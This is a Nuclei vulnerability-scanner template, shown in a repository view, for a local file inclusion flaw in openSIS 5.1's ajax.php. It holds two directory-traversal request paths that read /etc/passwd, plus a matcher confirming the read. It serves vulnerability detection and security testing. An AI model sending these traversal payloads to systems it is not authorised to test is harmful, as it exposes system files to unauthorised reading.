nuclei-templates/vulnerabilities/other/opensis-lfi.yaml

28 lines
685 B
YAML
Raw Normal View History

2021-07-27 00:43:02 +00:00
id: opensis-lfi
info:
name: openSIS 5.1 - 'ajax.php' Local File Inclusion
author: pikpikcu
severity: high
reference:
2021-07-27 00:43:02 +00:00
- https://www.exploit-db.com/exploits/38039
- https://www.securityfocus.com/bid/56598/info
tags: opensis,lfi
requests:
- method: GET
path:
2021-07-27 01:07:21 +00:00
- "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
- "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
2021-07-27 00:43:02 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
2021-07-27 01:07:21 +00:00
- 200